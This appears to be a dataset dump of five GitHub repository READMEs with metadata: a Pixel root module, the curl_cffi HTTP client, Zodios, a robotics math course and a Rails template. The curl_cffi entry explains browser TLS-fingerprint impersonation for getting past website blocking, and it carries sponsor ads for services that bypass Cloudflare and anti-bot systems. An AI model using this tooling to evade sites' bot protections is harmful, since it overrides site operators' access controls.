repo
stringlengths 7
106
| readme
stringlengths 1
512k
⌀ | description
stringlengths 1
3.38k
⌀ | topics
stringlengths 2
244
⌀ | releases
int64 0
1k
| contributors
int64 0
10k
| pulls
int64 0
66.4k
| commits
int64 1
463k
| issues
int64 0
14.5k
| branches
int64 1
4.52k
| workflows
int64 0
116
|
---|---|---|---|---|---|---|---|---|---|---|
siavash79/PixelXpert | ### For Pixel Stock Android 12 and 13 (Up to Nov 2022 - AOSP 13R8):
[![Latest Release for A12 & A13 up to Nov 2022](https://img.shields.io/badge/Download-v2.4.1-blue)](https://github.com/siavash79/PixelXpert/releases/tag/v2.4.1)
### For Pixel Stock Android 13 and 14 (starting with Dec 2022 security patch):
[![Latest Release](https://img.shields.io/github/v/release/siavash79/PixelXpert?color=green&include_prereleases&label=Download%20Latest%20Stable)](https://github.com/siavash79/PixelXpert/releases/latest)
[![Latest Canary Release](https://img.shields.io/badge/Download%20Latest-Canary-blue)](https://github.com/siavash79/PixelXpert/releases/tag/canary_builds)
![Downloads - Stable channel](https://img.shields.io/github/downloads/siavash79/PixelXpert/total?color=red&label=Downloads%20-%20Stable%20Channel)
### **PixelXpert Support Channels:**
[![XDA URL](https://img.shields.io/twitter/url?label=XDA%20Developers&logo=XDA-Developers&style=social&url=http://XDA.PixelXpert.siava.sh)](http://XDA.PixelXpert.siava.sh)
[![Telegram URL](https://img.shields.io/badge/Telegram-Join-2CA5E?style=social&logo=telegram)](https://t.me/PixelXpert_Discussion)
![Header Image](https://github.com/siavash79/PixelXpert/blob/canary/.github/PixelXpert_Banner_1280.png?raw=true)
This is a mixed Xposed+Magisk module, which is made to allow customizations that are not originally designed in AOSP (Android Open Source Project). Please read thorough below before reaching to download links
<hr>
### **Features:**
Currently, PixelXpert offers customizations on different aspects of system framework and SystemUI, including:
- Status bar
- Quick Settings panel
- Lock screen
- Notifications
- Gesture Navigations
- Phone & Dialer
- Hotspot
- Package Manager
- Screen properties
<hr>
### **Compatibility:**
PixelXpert is only fully compatible with pixel stock firmware. Any custom ROM is not tested and may not be fully (or even at all) compatible.
Here is the compatibility chart according to different android versions and QPRs:
- Android 12/12.1: [final version: v2.4.1](https://github.com/siavash79/PixelXpert/releases/tag/v2.4.1).
- Android 13 stable QPR1 (up until November 2022 firmware): [final version: v.2.4.1](https://github.com/siavash79/PixelXpert/releases/tag/v2.4.1).
- Android 13 stable QPR3 (starting from December 2022 firmware till QPR3): [starting with v.2.5](https://github.com/siavash79/PixelXpert/releases/tag/v2.5.0) up until the latest stable/canary versions.
- Android 14: [starting with v.2.9](https://github.com/siavash79/PixelXpert/releases/tag/v2.9.0) up until the latest stable/canary versions.
<hr>
- Android 14 QPR2 beta builds not yet fully compatible. Please be patient until we iron out the incompatibilities caused by code changes in source (source code not available for QPR beta)
<hr>
### **Prerequisites:**
- Compatible ROM (see Compatibility text above)
- Device Rooted with Magisk 24.2+ or KSU
- LSPosed (Zygisk Version preferred)
<hr>
### **How to install:**
- Download the stable magisk module according to your firmware as mentioned above
- Install in magisk/KSU
- Reboot (no bootloops are expected)
- Open PixelXpert app and apply changes
P.S. For KSU, there is an extra step of granting root access to PixelXpert as it doesn't request automatically as in Magisk
<hr>
### **Release Variants:**
The module is also released in 2 flavors with different manual download and update procedures. But both can utilize automated updates through magisk manager, or through in-app updater (for canary, updates will not count against the module's download count).
<ins>Stable release:</ins>
- Manual Install/Update: through repository's Github release page (link below) AND through in-app updater
<ins>Canary release:</ins>
- Manual Install/Update: through repository's Actions page and [telegram channel](https://t.me/PixelXpert_Github) (latest version is available from [here](https://github.com/siavash79/PixelXpert/releases/tag/canary_builds) also)
*No matter which flavor you're on, you can always switch to the other one with in-app updater
<hr>
### **Translations:**
[![Crowdin](https://badges.crowdin.net/aospmods/localized.svg)](https://crowdin.com/project/aospmods)
Want to help translate PixelXpert to your language? Visit [Crowdin](https://crowdin.com/project/aospmods)
<hr>
### **Donations:**
This project is open source and free for usage, build or copy. However, if you really feel like it, you can donate to your favorite charity on our behalf, or help funding education for children in need, at [Child Foundation](https://mycf.childfoundation.org/s/donate)
<hr>
### **Credits / Thanks:**
- Android Team
- @topjohnwu for Magisk
- @rovo89 for Xposed
- Team LSPosed
- apsun@github for remote-preferences
- @nijel8 for double-tap to wake
**UI design:**
- @Mahmud0808
**Graphic design:**
- JstormZx@Telegram (Icon and Banner)
- RKBDI@Telegram (Icon)
**Brought to you by:**
@siavash79 & @ElTifo
<hr>
| mixed Xposed+Magisk module for customization of Google Pixel rom of Android 12+ | customization,magisk-module,xposed-module | 30 | 37 | 295 | 3,183 | 0 | 4 | 6 |
yifeikong/curl_cffi | # curl_cffi
![PyPI - Downloads](https://img.shields.io/pypi/dm/curl-cffi)
![PyPI - Python Version](https://img.shields.io/pypi/pyversions/curl_cffi)
[![PyPI version](https://badge.fury.io/py/curl-cffi.svg)](https://badge.fury.io/py/curl-cffi)
[![Generic badge](https://img.shields.io/badge/Telegram%20Group-join-blue?logo=telegram)](https://t.me/+lL9n33eZp480MGM1)
[![Generic badge](https://img.shields.io/badge/微信交流群-加入-brightgreen?logo=wechat)](./assets/wechat.jpg)
[Documentation](https://curl-cffi.readthedocs.io) | [中文 README](https://github.com/yifeikong/curl_cffi/blob/main/README-zh.md)
Python binding for [curl-impersonate](https://github.com/lwthiker/curl-impersonate)
via [cffi](https://cffi.readthedocs.io/en/latest/).
Unlike other pure python http clients like `httpx` or `requests`, `curl_cffi` can
impersonate browsers' TLS/JA3 and HTTP/2 fingerprints. If you are blocked by some
website for no obvious reason, you can give `curl_cffi` a try.
------
<a href="https://scrapfly.io/?utm_source=github&utm_medium=sponsoring&utm_campaign=curl_cffi" target="_blank"><img src="assets/scrapfly.png" alt="Scrapfly.io" width="149"></a>
[Scrapfly](https://scrapfly.io/?utm_source=github&utm_medium=sponsoring&utm_campaign=curl_cffi)
is an enterprise-grade solution providing Web Scraping API that aims to simplify the
scraping process by managing everything: real browser rendering, rotating proxies, and
fingerprints (TLS, HTTP, browser) to bypass all major anti-bots. Scrapfly also unlocks the
observability by providing an analytical dashboard and measuring the success rate/block
rate in detail.
Scrapfly is a good solution if you are looking for a cloud-managed solution for `curl_cffi`.
If you are managing TLS/HTTP fingerprint by yourself with `curl_cffi`, they also maintain a
[curl to python converter](https://scrapfly.io/web-scraping-tools/curl-python/curl_cffi).
------
## Features
- Supports JA3/TLS and http2 fingerprints impersonation.
- Much faster than requests/httpx, on par with aiohttp/pycurl, see [benchmarks](https://github.com/yifeikong/curl_cffi/tree/main/benchmark).
- Mimics requests API, no need to learn another one.
- Pre-compiled, so you don't have to compile on your machine.
- Supports `asyncio` with proxy rotation on each request.
- Supports http 2.0, which requests does not.
- Supports websocket.
||requests|aiohttp|httpx|pycurl|curl_cffi|
|---|---|---|---|---|---|
|http2|❌|❌|✅|✅|✅|
|sync|✅|❌|✅|✅|✅|
|async|❌|✅|✅|❌|✅|
|websocket|❌|✅|❌|❌|✅|
|fingerprints|❌|❌|❌|❌|✅|
|speed|🐇|🐇🐇|🐇|🐇🐇|🐇🐇|
## Install
pip install curl_cffi --upgrade
This should work on Linux, macOS and Windows out of the box.
If it does not work on you platform, you may need to compile and install `curl-impersonate`
first and set some environment variables like `LD_LIBRARY_PATH`.
To install beta releases:
pip install curl_cffi --upgrade --pre
To install unstable version from GitHub:
git clone https://github.com/yifeikong/curl_cffi/
cd curl_cffi
make preprocess
pip install .
## Usage
`curl_cffi` comes with a low-level `curl` API and a high-level `requests`-like API.
Use the latest impersonate versions, do NOT copy `chrome110` here without changing.
### requests-like
```python
from curl_cffi import requests
# Notice the impersonate parameter
r = requests.get("https://tools.scrapfly.io/api/fp/ja3", impersonate="chrome110")
print(r.json())
# output: {..., "ja3n_hash": "aa56c057ad164ec4fdcb7a5a283be9fc", ...}
# the js3n fingerprint should be the same as target browser
# To keep using the latest browser version as `curl_cffi` updates,
# simply set impersonate="chrome" without specifying a version.
# Other similar values are: "safari" and "safari_ios"
r = requests.get("https://tools.scrapfly.io/api/fp/ja3", impersonate="chrome")
# http/socks proxies are supported
proxies = {"https": "http://localhost:3128"}
r = requests.get("https://tools.scrapfly.io/api/fp/ja3", impersonate="chrome110", proxies=proxies)
proxies = {"https": "socks://localhost:3128"}
r = requests.get("https://tools.scrapfly.io/api/fp/ja3", impersonate="chrome110", proxies=proxies)
```
### Sessions
```python
s = requests.Session()
# httpbin is a http test website, this endpoint makes the server set cookies
s.get("https://httpbin.org/cookies/set/foo/bar")
print(s.cookies)
# <Cookies[<Cookie foo=bar for httpbin.org />]>
# retrieve cookies again to verify
r = s.get("https://httpbin.org/cookies")
print(r.json())
# {'cookies': {'foo': 'bar'}}
```
Supported impersonate versions, as supported by my [fork](https://github.com/yifeikong/curl-impersonate) of [curl-impersonate](https://github.com/lwthiker/curl-impersonate):
However, only Chrome-like browsers are supported. Firefox support is tracked in [#59](https://github.com/yifeikong/curl_cffi/issues/59).
Browser versions will be added **only** when their fingerprints change. If you see a version, e.g.
chrome122, were skipped, you can simply impersonate it with your own headers and the previous version.
- chrome99
- chrome100
- chrome101
- chrome104
- chrome107
- chrome110
- chrome116 <sup>[1]</sup>
- chrome119 <sup>[1]</sup>
- chrome120 <sup>[1]</sup>
- chrome123 <sup>[3]</sup>
- chrome124 <sup>[3]</sup>
- chrome99_android
- edge99
- edge101
- safari15_3 <sup>[2]</sup>
- safari15_5 <sup>[2]</sup>
- safari17_0 <sup>[1]</sup>
- safari17_2_ios <sup>[1]</sup>
Notes:
1. Added in version `0.6.0`.
2. Fixed in version `0.6.0`, previous http2 fingerprints were [not correct](https://github.com/lwthiker/curl-impersonate/issues/215).
3. Added in version `0.7.0`.
### asyncio
```python
from curl_cffi.requests import AsyncSession
async with AsyncSession() as s:
r = await s.get("https://example.com")
```
More concurrency:
```python
import asyncio
from curl_cffi.requests import AsyncSession
urls = [
"https://google.com/",
"https://facebook.com/",
"https://twitter.com/",
]
async with AsyncSession() as s:
tasks = []
for url in urls:
task = s.get(url)
tasks.append(task)
results = await asyncio.gather(*tasks)
```
### WebSockets
```python
from curl_cffi.requests import Session, WebSocket
def on_message(ws: WebSocket, message):
print(message)
with Session() as s:
ws = s.ws_connect(
"wss://api.gemini.com/v1/marketdata/BTCUSD",
on_message=on_message,
)
ws.run_forever()
```
For low-level APIs, Scrapy integration and other advanced topics, see the
[docs](https://curl-cffi.readthedocs.io) for more details.
## Acknowledgement
- Originally forked from [multippt/python_curl_cffi](https://github.com/multippt/python_curl_cffi), which is under the MIT license.
- Headers/Cookies files are copied from [httpx](https://github.com/encode/httpx/blob/master/httpx/_models.py), which is under the BSD license.
- Asyncio support is inspired by Tornado's curl http client.
- The WebSocket API is inspired by [websocket_client](https://github.com/websocket-client/websocket-client).
## [Sponsor] Bypass Cloudflare with API
<a href="https://yescaptcha.com/i/stfnIO" target="_blank"><img src="assets/yescaptcha.png" alt="Yes Captcha!" height="47" width="149"></a>
Yescaptcha is a proxy service that bypasses Cloudflare and uses the API interface to obtain verified cookies (e.g. `cf_clearance`). Click [here](https://yescaptcha.com/i/stfnIO) to register: https://yescaptcha.com/i/stfnIO
## [Sponsor] ScrapeNinja
<a href="https://scrapeninja.net?utm_source=github&utm_medium=banner&utm_campaign=cffi" target="_blank"><img src="https://scrapeninja.net/img/logo_with_text_new5.svg" alt="Scrape Ninja" width="149"></a>
[ScrapeNinja](https://scrapeninja.net?utm_source=github&utm_medium=banner&utm_campaign=cffi) is a web scraping API with two engines: fast, with high performance and TLS
fingerprint; and slower with a real browser under the hood.
ScrapeNinja handles headless browsers, proxies, timeouts, retries, and helps with data
extraction, so you can just get the data in JSON. Rotating proxies are available out of
the box on all subscription plans.
## Sponsor
<a href="https://buymeacoffee.com/yifei" target="_blank"><img src="https://cdn.buymeacoffee.com/buttons/default-orange.png" alt="Buy Me A Coffee" height="41" width="174"></a>
## Citation
If you find this project useful, please cite it as below:
```
@software{Kong2023,
author = {Yifei Kong},
title = {curl_cffi - A Python HTTP client for impersonating browser TLS and HTTP/2 fingerprints},
year = {2023},
publisher = {GitHub},
journal = {GitHub repository},
url = {https://github.com/yifeikong/curl_cffi},
}
```
| Python binding for curl-impersonate via cffi. A http client that can impersonate browser tls/ja3/http2 fingerprints. | curl,http-client,curl-impersonate,http,https,ja3,ja3-fingerprint,tls-fingerprint,fingerprinting,web-scraping | 8 | 23 | 71 | 267 | 30 | 5 | 1 |
ecyrbe/zodios | <h1 align="center">Zodios</h1>
<p align="center">
<a href="https://github.com/ecyrbe/zodios">
<img align="center" src="https://raw.githubusercontent.com/ecyrbe/zodios/main/docs/logo.svg" width="128px" alt="Zodios logo">
</a>
</p>
<p align="center">
Zodios is a typescript api client and an optional api server with auto-completion features backed by <a href="https://axios-http.com" >axios</a> and <a href="https://github.com/colinhacks/zod">zod</a> and <a href="https://expressjs.com/">express</a>
<br/>
<a href="https://www.zodios.org/">Documentation</a>
</p>
<p align="center">
<a href="https://www.npmjs.com/package/@zodios/core">
<img src="https://img.shields.io/npm/v/@zodios/core.svg" alt="langue typescript">
</a>
<a href="https://www.npmjs.com/package/@zodios/core">
<img alt="npm" src="https://img.shields.io/npm/dw/@zodios/core">
</a>
<a href="https://github.com/ecyrbe/zodios/blob/main/LICENSE">
<img alt="GitHub" src="https://img.shields.io/github/license/ecyrbe/zodios">
</a>
<img alt="GitHub Workflow Status" src="https://img.shields.io/github/actions/workflow/status/ecyrbe/zodios/ci.yml?branch=main">
</p>
<p align="center">
<img alt="Bundle Size" src="https://img.shields.io/bundlephobia/minzip/@zodios/core?label=%40zodios%2Fcore"/>
<img alt="Bundle Size" src="https://img.shields.io/bundlephobia/minzip/@zodios/fetch?label=%40zodios%2Ffetch"/>
<img alt="Bundle Size" src="https://img.shields.io/bundlephobia/minzip/@zodios/axios?label=%40zodios%2Faxios"/>
<img alt="Bundle Size" src="https://img.shields.io/bundlephobia/minzip/@zodios/react?label=%40zodios%2Freact"/>
<img alt="Bundle Size" src="https://img.shields.io/bundlephobia/minzip/@zodios/express?label=%40zodios%2Fexpress"/>
<img alt="Bundle Size" src="https://img.shields.io/bundlephobia/minzip/@zodios/openapi?label=%40zodios%2Fopenapi"/>
<img alt="Bundle Size" src="https://img.shields.io/bundlephobia/minzip/@zodios/testing?label=%40zodios%2Ftesting"/>
</p>
https://user-images.githubusercontent.com/633115/185851987-554f5686-cb78-4096-8ff5-c8d61b645608.mp4
# What is it ?
It's an axios compatible API client and an optional expressJS compatible API server with the following features:
- really simple centralized API declaration
- typescript autocompletion in your favorite IDE for URL and parameters
- typescript response types
- parameters and responses schema thanks to zod
- response schema validation
- powerfull plugins like `fetch` adapter or `auth` automatic injection
- all axios features available
- `@tanstack/query` wrappers for react and solid (vue, svelte, etc, soon)
- all expressJS features available (middlewares, etc.)
**Table of contents:**
- [What is it ?](#what-is-it-)
- [Install](#install)
- [Client and api definitions :](#client-and-api-definitions-)
- [Server :](#server-)
- [How to use it on client side ?](#how-to-use-it-on-client-side-)
- [Declare your API with zodios](#declare-your-api-with-zodios)
- [API definition format](#api-definition-format)
- [Full documentation](#full-documentation)
- [Ecosystem](#ecosystem)
- [Roadmap](#roadmap)
- [Dependencies](#dependencies)
# Install
## Client and api definitions :
```bash
> npm install @zodios/core
```
or
```bash
> yarn add @zodios/core
```
## Server :
```bash
> npm install @zodios/core @zodios/express
```
or
```bash
> yarn add @zodios/core @zodios/express
```
# How to use it on client side ?
For an almost complete example on how to use zodios and how to split your APIs declarations, take a look at [dev.to](examples/dev.to/) example.
## Declare your API with zodios
Here is an example of API declaration with Zodios.
```typescript
import { Zodios } from "@zodios/core";
import { z } from "zod";
const apiClient = new Zodios(
"https://jsonplaceholder.typicode.com",
// API definition
[
{
method: "get",
path: "/users/:id", // auto detect :id and ask for it in apiClient get params
alias: "getUser", // optional alias to call this endpoint with it
description: "Get a user",
response: z.object({
id: z.number(),
name: z.string(),
}),
},
],
);
```
Calling this API is now easy and has builtin autocomplete features :
```typescript
// typed auto-complete path auto-complete params
// ▼ ▼ ▼
const user = await apiClient.get("/users/:id", { params: { id: 7 } });
console.log(user);
```
It should output
```js
{ id: 7, name: 'Kurtis Weissnat' }
```
You can also use aliases :
```typescript
// typed alias auto-complete params
// ▼ ▼ ▼
const user = await apiClient.getUser({ params: { id: 7 } });
console.log(user);
```
## API definition format
```typescript
type ZodiosEndpointDescriptions = Array<{
method: 'get'|'post'|'put'|'patch'|'delete';
path: string; // example: /posts/:postId/comments/:commentId
alias?: string; // example: getPostComments
immutable?: boolean; // flag a post request as immutable to allow it to be cached with react-query
description?: string;
requestFormat?: 'json'|'form-data'|'form-url'|'binary'|'text'; // default to json if not set
parameters?: Array<{
name: string;
description?: string;
type: 'Path'|'Query'|'Body'|'Header';
schema: ZodSchema; // you can use zod `transform` to transform the value of the parameter before sending it to the server
}>;
response: ZodSchema; // you can use zod `transform` to transform the value of the response before returning it
status?: number; // default to 200, you can use this to override the sucess status code of the response (only usefull for openapi and express)
responseDescription?: string; // optional response description of the endpoint
errors?: Array<{
status: number | 'default';
description?: string;
schema: ZodSchema; // transformations are not supported on error schemas
}>;
}>;
```
# Full documentation
Check out the [full documentation](https://www.zodios.org) or following shortcuts.
- [API definition](https://www.zodios.org/docs/category/zodios-api-definition)
- [Http client](https://www.zodios.org/docs/category/zodios-client)
- [React hooks](https://www.zodios.org/docs/client/react)
- [Solid hooks](https://www.zodios.org/docs/client/solid)
- [API server](http://www.zodios.org/docs/category/zodios-server)
- [Nextjs integration](http://www.zodios.org/docs/server/next)
# Ecosystem
- [openapi-zod-client](https://github.com/astahmer/openapi-zod-client): generate a zodios client from an openapi specification
- [@zodios/express](https://github.com/ecyrbe/zodios-express): full end to end type safety like tRPC, but for REST APIs
- [@zodios/plugins](https://github.com/ecyrbe/zodios-plugins) : some plugins for zodios
- [@zodios/react](https://github.com/ecyrbe/zodios-react) : a react-query wrapper for zodios
- [@zodios/solid](https://github.com/ecyrbe/zodios-solid) : a solid-query wrapper for zodios
# Roadmap for v11
for Zod` / `Io-Ts` :
- By using the TypeProvider pattern we can now make zodios validation agnostic.
- Implement at least ZodTypeProvider and IoTsTypeProvider since they both support `input` and `output` type inferrence
- openapi generation will only be compatible with zod though
- Not a breaking change so no codemod needed
- [x] MonoRepo:
- Zodios will become a really large project so maybe migrate to turbo repo + pnpm
- not a breaking change
- [ ] Transform:
- By default, activate transforms on backend and disable on frontend (today it's the opposite), would make server transform code simpler since with this option we could make any transforms activated not just zod defaults.
- Rationale being that transformation can be viewed as business code that should be kept on backend
- breaking change => codemod to keep current defaults by setting them explicitly
- [x] Axios:
- Move Axios client to it's own package `@zodios/axios` and keep `@zodios/core` with only common types and helpers
- Move plugins to `@zodios/axios-plugins`
- breaking change => easy to do a codemod for this
- [x] Fetch:
- Create a new Fetch client with almost the same features as axios, but without axios dependency `@zodios/fetch`
- Today we have fetch support with a plugin for axios instance (zodios maintains it's own axios network adapter for fetch). But since axios interceptors are not used by zodios plugins, we can make fetch implementation lighter than axios instance.
- Create plugins package `@zodios/fetch-plugins`
- Not sure it's doable without a lot of effort to keep it in sync/compatible with axios client
- new feature, so no codemod needed
- [ ] React/Solid:
- make ZodiosHooks independant of Zodios client instance (axios, fetch)
- not a breaking change, so no codemod needed
- [x] Client Request Config
- uniform Query/Mutation with body sent on the config and not as a standalone object. This would allow to not do `client.deleteUser(undefined, { params: { id: 1 } })` but simply `client.deleteUser({ params: { id: 1 } })`
- breaking change, so a codemod would be needed, but might be difficult to implement
- [x] Mock/Tests:
- if we implement an abstraction layer for client instance, relying on moxios to mock APIs response will likely not work for fetch implementation.
- create a `@zodios/testing` package that work for both axios/fetch clients
- new feature, so no breaking change (no codemod needed)
You have other ideas ? [Let me know !](https://github.com/ecyrbe/zodios/discussions)
# Dependencies
Zodios even when working in pure Javascript is better suited to be working with Typescript Language Server to handle autocompletion.
So you should at least use the one provided by your IDE (vscode integrates a typescript language server)
However, we will only support fixing bugs related to typings for versions of Typescript Language v4.5
Earlier versions should work, but do not have TS tail recusion optimisation that impact the size of the API you can declare.
Also note that Zodios do not embed any dependency. It's your Job to install the peer dependencies you need.
Internally Zodios uses these libraries on all platforms :
- zod
- axios
| typescript http client and server with zod validation | zod,http,typescript,api,nodejs,openapi,rest | 69 | 25 | 386 | 843 | 10 | 8 | 2 |
michiganrobotics/rob501 | # Robotics 501: Mathematics for Robotics
ROB 501: Mathematics for Robotics, is a graduate-level course at the University of Michigan that introduces applied mathematics for robotics engineers.
Topics include vector spaces, orthogonal bases, projection theorem, least squares, matrix factorizations, Kalman filter and underlying probabilistic concepts, norms, convergent sequences, contraction mappings, Newton Raphson algorithm, local vs global convergence in nonlinear optimization, convexity, linear and quadratic programs.
This offering of the course is from Fall 2018.
## Prerequisites
It is assumed that students know basic matrix algebra, such as how to multiply and invert matrices, what is the rank of a matrix, and how to compute eigenvectors; know how to compute means and variances given a density of a continuous random variable, and conditional probability and how to compute it; know vector calculus and will review how to compute gradients of functions and what is the method of Lagrange multipliers; simple properties of complex numbers; and how to use MATLAB, including plotting, various types of multiplication, such as * vs .* (star vs dot star), writing a for loop, or finding help.
## Lecture Videos, Textbook & Notes
All lecture videos are available on YouTube:
[ROB 501 Fall 2018 videos](https://www.youtube.com/playlist?list=PLdPQZLMHRjDIzO99aE7yAtdOHSVHMXfYH)
Also, the [textbook](https://github.com/michiganrobotics/rob501/tree/main/Textbook/ROB501_Textbook2022_03_21.pdf), [lecture notes](https://github.com/michiganrobotics/rob501/tree/main/Lecture%20Notes) and [handouts](https://github.com/michiganrobotics/rob501/tree/main/Handouts) are available.
## Recitatioins
[Recitation questions and answers](https://github.com/michiganrobotics/rob501/tree/main/Recitations) are both available.
## Course Plan
| Lecture | Topic | YouTube | Assignments Due |
|---------|------------------------------------------------------------|----------------------------------------------------------------------------------------------|--------------------|
| 1 | Intro & Proofs | [Video](https://www.youtube.com/watch?v=2-aK25lBzvI&list=PLdPQZLMHRjDIzO99aE7yAtdOHSVHMXfYH&index=1) | |
| 2 | Induction, Fundamental Theorem, & Contradiction | [Video](https://www.youtube.com/watch?v=f559OMvSGMg&list=PLdPQZLMHRjDIzO99aE7yAtdOHSVHMXfYH&index=2) | |
| 3 | Abstract Linear Algebra | [Video](https://www.youtube.com/watch?v=eZxsj8k-UbY&list=PLdPQZLMHRjDIzO99aE7yAtdOHSVHMXfYH&index=3) | |
| 4 | Subspaces & Linear Independence | [Video](https://www.youtube.com/watch?v=PL6AkVR-HUk&list=PLdPQZLMHRjDIzO99aE7yAtdOHSVHMXfYH&index=4) | [Homework 1](https://github.com/michiganrobotics/rob501/blob/main/Homework/Homework%2001.pdf) |
| 5 | Basis Vectors & Dimension | [Video](https://www.youtube.com/watch?v=B-x9uuBcQac&list=PLdPQZLMHRjDIzO99aE7yAtdOHSVHMXfYH&index=5) | |
| 6 | Linear Operators & Eigenvalues | [Video](https://www.youtube.com/watch?v=89QF687IeT8&list=PLdPQZLMHRjDIzO99aE7yAtdOHSVHMXfYH&index=6) | [Homework 2](https://github.com/michiganrobotics/rob501/blob/main/Homework/Homework%2002.pdf) |
| 7 | Similar Matrices & Norms | [Video](https://www.youtube.com/watch?v=yTd33p8pmaY&list=PLdPQZLMHRjDIzO99aE7yAtdOHSVHMXfYH&index=7) | |
| 8 | Inner Product Spaces | [Video](https://www.youtube.com/watch?v=Gp_z3aLpTyY&list=PLdPQZLMHRjDIzO99aE7yAtdOHSVHMXfYH&index=8) | [Homework 3](https://github.com/michiganrobotics/rob501/blob/main/Homework/Homework%2003.pdf) |
| 9 | Projection Theorem & Gram-Schmidt | [Video](https://www.youtube.com/watch?v=Bg6JdhoHyn0&list=PLdPQZLMHRjDIzO99aE7yAtdOHSVHMXfYH&index=9) | |
| 10 | Normal Equations & Least Squares | [Video](https://www.youtube.com/watch?v=y5Ef5UriN58&list=PLdPQZLMHRjDIzO99aE7yAtdOHSVHMXfYH&index=10) | [Homework 4](https://github.com/michiganrobotics/rob501/blob/main/Homework/Homework%2004.pdf) |
| 11 | Symmetric & Orthogonal Matrices | [Video](https://www.youtube.com/watch?v=-rp1jsBV7x8&list=PLdPQZLMHRjDIzO99aE7yAtdOHSVHMXfYH&index=11) | |
| 12 | Positive Semi-Definite Matrices & Schur Complement Theorem | [Video](https://www.youtube.com/watch?v=iyvfKlZuG-g&list=PLdPQZLMHRjDIzO99aE7yAtdOHSVHMXfYH&index=12) | [Homework 5](https://github.com/michiganrobotics/rob501/blob/main/Homework/Homework%2005.pdf) |
| 13 | Recursive Least Squares & Kalman Filter | [Video](https://www.youtube.com/watch?v=Ha2ls-aLmgs&list=PLdPQZLMHRjDIzO99aE7yAtdOHSVHMXfYH&index=13) | |
| 14 | Least Squares & Probability | [Video](https://www.youtube.com/watch?v=QwjS-0fInnQ&list=PLdPQZLMHRjDIzO99aE7yAtdOHSVHMXfYH&index=14) | |
| 15 | Best Linear Unbiased Estimator | [Video](https://www.youtube.com/watch?v=4ah5DzYjFUE&list=PLdPQZLMHRjDIzO99aE7yAtdOHSVHMXfYH&index=15) | [Homework 6](https://github.com/michiganrobotics/rob501/blob/main/Homework/Homework%2006.pdf) |
| 16 | QR Factorization | [Video](https://www.youtube.com/watch?v=AqPpZyLf37I&list=PLdPQZLMHRjDIzO99aE7yAtdOHSVHMXfYH&index=16) | [Exam 1](https://github.com/michiganrobotics/rob501/tree/main/Exams) |
| 17 | Modified Gram-Schmidt & Minimum Variance Estimator | [Video](https://www.youtube.com/watch?v=hVnJiNXJTAs&list=PLdPQZLMHRjDIzO99aE7yAtdOHSVHMXfYH&index=17) | |
| 18 | Probability Space & Random Variables | [Video](https://www.youtube.com/watch?v=dnMH9sCuudA&list=PLdPQZLMHRjDIzO99aE7yAtdOHSVHMXfYH&index=18) | |
| 19 | Gaussian Random Vectors | [Video](https://www.youtube.com/watch?v=jPSRL_PABVI&list=PLdPQZLMHRjDIzO99aE7yAtdOHSVHMXfYH&index=19) | [Homework 7](https://github.com/michiganrobotics/rob501/blob/main/Homework/Homework%2007.pdf) |
| 20 | Real Analysis & Normed Spaces | [Video](https://www.youtube.com/watch?v=9Hvq-Fe6YmM&list=PLdPQZLMHRjDIzO99aE7yAtdOHSVHMXfYH&index=20) | |
| 21 | Real Analysis & Interior of a Set | [Video](https://www.youtube.com/watch?v=v25gVgzrqHg&list=PLdPQZLMHRjDIzO99aE7yAtdOHSVHMXfYH&index=21) | [Homework 8](https://github.com/michiganrobotics/rob501/blob/main/Homework/Homework%2008.pdf) |
| 22 | Newton-Raphson Algorithm | [Video](https://www.youtube.com/watch?v=oAw2mqSoRr4&list=PLdPQZLMHRjDIzO99aE7yAtdOHSVHMXfYH&index=22) | |
| 23 | Cauchy Sequences | [Video](https://www.youtube.com/watch?v=IVx2SvN4hQ8&list=PLdPQZLMHRjDIzO99aE7yAtdOHSVHMXfYH&index=23) | [Homework 9](https://github.com/michiganrobotics/rob501/blob/main/Homework/Homework%2009.pdf) |
| 24 | Continuous Functions | [Video](https://www.youtube.com/watch?v=_2CcWd4qryU&list=PLdPQZLMHRjDIzO99aE7yAtdOHSVHMXfYH&index=24) | |
| 25 | Weierstrass Theorem | [Video](https://www.youtube.com/watch?v=DT367udR6Uc&list=PLdPQZLMHRjDIzO99aE7yAtdOHSVHMXfYH&index=25) | |
| 26 | Final Class & Linear Programming | [Video](https://www.youtube.com/watch?v=H-2_Tl-4p_A&list=PLdPQZLMHRjDIzO99aE7yAtdOHSVHMXfYH&index=26) | [Homework 10](https://github.com/michiganrobotics/rob501/blob/main/Homework/Homework%2010.pdf) & [Exam 2](https://github.com/michiganrobotics/rob501/tree/main/Exams) |
A [more detailed course plan](https://github.com/michiganrobotics/rob501/tree/main/Course%20Schedule) is available.
## Credits
- Jessy Grizzle, Director, Michigan Robotics
- Nils Smit-Anseeuw
## License
All code is licensed under the [GNU General Public License v3.0](https://github.com/michiganrobotics/rob101/blob/main/LICENSE).
All other content, including textbooks, homeworks, and video, is licensed under the [Creative Commons Attribution-NonCommericial 4.0 (CC BY-NC 4.0)](https://creativecommons.org/licenses/by-nc/4.0/).
## For more
- [University of Michigan Robotics](https://robotics.umich.edu)
- [Michigan Robotics Twitter](http://twitter.com/umrobotics)
- [Michigan Robotics Instagram](http://instagram.com/umrobotics/)
| Mathematics for Robotics | null | 0 | 2 | 0 | 10 | 0 | 1 | 0 |
bullet-train-co/bullet_train | # Bullet Train Application Template
If you're new to Bullet Train, start with the [Bullet Train Developer Documentation](https://bullettrain.co/docs) and the [Getting Started](https://bullettrain.co/docs/getting-started) guide. You should also [join the community Discord server](https://discord.gg/bullettrain)!
## Building a New Application with Bullet Train
If you're building a new application with Bullet Train, you don't want to "Fork" the template repository on GitHub. Instead, you should:
1. Clone the template repository:
```
git clone git@github.com:bullet-train-co/bullet_train.git your_new_project_name
```
2. Enter the project directory:
```
cd your_new_project_name
```
3. Run the configuration and setup scripts:
```
bin/configure
bin/setup
```
4. Boot your application:
```
bin/dev
```
5. Visit `http://localhost:3000`.
## Cloud Development with Gitpod
[![Open in Gitpod](https://gitpod.io/button/open-in-gitpod.svg)](https://gitpod.io/#https://github.com/bullet-train-co/bullet_train)
Clicking this button will set up a new Bullet Train project for development on [Gitpod](https://gitpod.io).
<br>
<br>
<p align="center">
<strong>Open-source development sponsored by:</strong>
</p>
<p align="center">
<a href="https://www.clickfunnels.com"><img src="https://images.clickfunnel.com/uploads/digital_asset/file/176632/clickfunnels-dark-logo.svg" width="575" /></a>
</p>
<br>
<br>
## Provisioning a Production Environment
You can use this public repository to provision a new application and then push your private application code there later.
### Render
[![Deploy to Render](https://render.com/images/deploy-to-render-button.svg)](https://render.com/deploy?repo=https://github.com/bullet-train-co/bullet_train)
